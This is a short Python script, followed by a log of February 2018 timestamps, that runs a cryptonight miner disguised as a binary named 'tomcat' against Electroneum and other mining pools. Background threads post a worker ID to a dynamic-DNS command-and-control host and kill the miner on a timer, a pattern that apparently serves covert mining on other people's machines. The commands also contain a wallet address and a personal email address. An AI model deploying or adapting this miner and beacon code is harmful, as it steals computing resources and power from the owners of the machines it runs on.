import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:03.890480
#2018-02-17 16:44:05.202562
#2018-02-17 18:33:06.216617
#2018-02-17 20:21:07.160760
#2018-02-17 22:08:05.776630
#2018-02-17 23:52:03.142011
#2018-02-18 01:41:01.773851
#2018-02-18 03:28:03.981253
#2018-02-18 05:16:02.148737
#2018-02-18 07:08:05.754771
#2018-02-18 08:55:07.133707
#2018-02-18 10:42:05.941516
#2018-02-18 12:26:07.524204
#2018-02-18 14:14:01.747824
#2018-02-18 16:03:07.036760
#2018-02-18 17:51:06.282370
#2018-02-18 19:38:06.727638
#2018-02-18 21:23:06.110089
#2018-02-18 23:12:04.036119
#2018-02-19 00:58:01.354350
#2018-02-19 02:46:07.254741
#2018-02-19 04:32:02.027410
#2018-02-19 06:17:06.233631
#2018-02-19 08:05:06.715299
#2018-02-19 09:55:06.715870
#2018-02-19 11:44:04.802196
#2018-02-19 13:31:01.870641
#2018-02-19 15:19:05.258541
#2018-02-19 17:06:06.526647
#2018-02-19 18:53:05.648635
#2018-02-19 20:42:07.107854
#2018-02-19 22:29:06.723137
#2018-02-20 00:15:03.258686
#2018-02-20 02:02:07.448762
#2018-02-20 03:52:06.375940
#2018-02-20 05:36:01.596547
#2018-02-20 07:21:01.759103
#2018-02-20 09:06:01.428280
#2018-02-20 10:49:07.318061
#2018-02-20 12:36:07.195636
#2018-02-20 14:22:05.759274
#2018-02-20 16:06:07.813957
#2018-02-20 17:51:06.871837
#2018-02-20 19:43:01.859446
#2018-02-20 21:31:06.878463
#2018-02-20 23:14:07.447995
#2018-02-21 00:59:05.414957
#2018-02-21 02:46:01.743942
#2018-02-21 04:36:03.116636
#2018-02-21 06:24:04.961711
#2018-02-21 08:09:04.464442
#2018-02-21 09:56:06.759334
#2018-02-21 11:44:05.491836
#2018-02-21 13:34:08.730996
#2018-02-21 15:19:01.796357
#2018-02-21 17:09:10.066856
#2018-02-21 18:56:05.176450
#2018-02-21 20:41:07.959515
#2018-02-21 22:26:07.572264
#2018-02-22 00:16:01.818071
#2018-02-22 02:03:04.893030
#2018-02-22 03:48:05.699873
#2018-02-22 05:35:04.025899
#2018-02-22 07:20:06.356756
#2018-02-22 09:07:04.740412
#2018-02-22 10:54:09.069443
#2018-02-22 12:39:10.097177
#2018-02-22 14:23:05.799495
#2018-02-22 16:12:01.949689
#2018-02-22 17:59:09.539766
#2018-02-22 19:48:08.320387
#2018-02-22 21:39:06.195467
#2018-02-22 23:27:07.225045
#2018-02-23 01:14:08.391685
#2018-02-23 03:01:07.725483
#2018-02-23 04:48:01.775018
#2018-02-23 06:34:01.419370
#2018-02-23 08:21:04.478105
#2018-02-23 10:37:05.725004
#2018-02-23 12:29:05.750536
#2018-02-23 14:17:08.012113
#2018-02-23 16:09:07.179959
#2018-02-23 17:54:07.091360
#2018-02-23 19:41:04.188253
#2018-02-23 21:24:04.079504
#2018-02-23 23:11:07.393879
#2018-02-24 00:53:04.558728
#2018-02-24 02:48:03.721065
#2018-02-24 05:28:08.003086
#2018-02-24 07:15:05.929130
#2018-02-24 09:06:01.520491
#2018-02-24 10:42:07.214918
#2018-02-24 12:26:05.203782
#2018-02-24 14:04:07.408494
#2018-02-24 15:40:08.236648
#2018-02-24 17:20:07.354390
#2018-02-24 18:53:06.459247
#2018-02-24 20:27:04.989775
#2018-02-24 21:56:06.432379
#2018-02-25 00:44:01.280364
#2018-02-25 04:41:04.549244
#2018-02-25 08:33:01.507455